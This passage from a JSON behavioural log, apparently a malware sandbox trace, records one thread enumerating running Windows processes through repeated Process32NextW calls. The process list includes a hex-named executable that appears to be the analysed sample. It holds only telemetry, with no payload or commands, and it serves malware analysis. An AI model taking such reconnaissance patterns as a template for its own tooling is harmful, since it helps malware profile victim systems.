0, + "id": 2039 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 2040 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 2041 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 2042 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 2043 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 2044 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 2045 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 2046 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 2047 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 2048 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 2049 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 2050 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 2051 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 2052 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 2053 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 2054 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 2055 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 2056 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 2057 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 2058 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 2059 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 2060 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 2061 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 2062 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 2063 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 2064 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 2065 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 2066 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 2067 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 2068 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 2069 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 2070 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 2071 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 2072 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 2073 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 2074 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 2075 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 2076 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 2077 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 2078 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 2079 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 2080 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 2081 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 2082 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 2083 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 2084 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 2085 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 2086 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 2087 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 2088 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 2089 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 2090 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 2091 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 2092 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 2093 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 2094 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6344" + } + ], + "repeated": 0, + "id": 2095 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 2096 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 2097 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 2098 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "8172" + } + ], + "repeated": 0, + "id": 2099 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 2100 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 2101 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6292" + } + ], + "repeated": 0, + "id": 2102 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 2103 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 2104 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 2105 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 2106 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 2107 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 2108 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 2109 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 2110 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 2111 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 2112 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8568" + } + ], + "repeated": 0, + "id": 2113 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 2114 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 2115 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 2116 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 2117 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 2118 + }, + { + "timestamp": "2025-03-07 22:35:04,579", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "10120" + } + ], + "repeated": 0, + "id": 2119 + 